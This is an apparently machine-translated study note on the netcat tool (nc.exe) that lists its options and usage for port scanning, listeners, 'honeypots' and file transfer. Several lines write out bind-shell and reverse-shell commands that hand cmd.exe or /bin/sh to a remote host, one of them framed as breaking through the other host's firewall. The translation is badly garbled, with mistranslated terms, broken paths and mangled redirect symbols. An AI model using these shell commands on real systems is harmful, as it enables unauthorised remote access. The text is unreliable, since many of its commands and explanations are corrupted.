May 23, 2021 DOS Command learning manual
1, Swiss Army Knife: nc .exe
Description of the parameters:
-h View help information
-d Background mode
-e prog program redirection, but the connection is performed on the "dangerous"
-i secs delay interval
-l Listen mode for inbound connections
-L listening mode, continue listening after the connection is closed until CTR-C
-n IP address, domain name cannot be used
-o film records a 16-step transfer
The local port number of the -p-space port
-r Random local and remote ports
-t Use Telnet interaction
-u UDP mode
-v detailed output, with -vv will be more detailed
-w-number timeout delay interval
-z Turn off the input, the output (for sweeping anchors)
Basic usage:
nc -nvv 192.168.0.1 80 is connected to the 80 ports of the 192.168.0.1 host
nc -l -p 80 turns on the TCP 80 port of the machine and listens
nc -nvv -w2 -z 192.168.0.1 80-1024 Sweep Anchor 192.168.0.1 port 80-1024
nc -l -p 5354 -t -e: winntsystem32cmd.exe binding the cmdshell of the remote host on the TCP 5354 port of remote
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 teding the cmdshell of the remote host and connecting back to port 5354 of 192.168.0.2
Advanced usage:
nc -L -p 80 as a honeypot 1: Open and keep listening to port 80 until CTR-C
nc -L -p 80 sgt; c:-log.txt as a honeypot 2: Open and constantly listen to port 80 until CTR-C, while outputing the results to c:\log.txt
nc -L -p 80 slt; c: s honeyport.txt as a honeypot with 3-1: Open and constantly listen to 80 ports until CTR-C, and put the contents of c:-honeyport.txt into the pipeline, can also play a role in the transfer of files
type.exe c:\honeyport | n c -L -p 80 as a honeypot with 3-2: Open and constantly listen to port 80 until CTR-C, and put the contents of c:-honeyport.txt into the pipeline, can also play a role in transferring files
For use on this machine: nc -l -p machine port
On the other side of the host with: nc -e cmd.exe local IP -p local port s win2K
nc -e /bin/sh local IP -p local port s linux, unix reverse connection breaks through the firewall of the other host
For this machine: nc -d -l -l -p local port and the file path and name to be transferred
On the other side of the host with: nc -vv local IP local port and the path and name of the file storage transfer files to the other host
Note:
| T he pipeline command
Or redirect commands. F or example, tlntadmn and .txt refers to assigning the content .txt test to the tntadmn command
The following command @dir is executed, but does not appear (background execution.txt.txt);
The difference between "and" means: coverage;
For example: @dir c:\winnt?gt;d:?log.txt and @dir c:?winnt?d:?log.txt two commands are performed in a second comparison look: with the second results are saved, and with: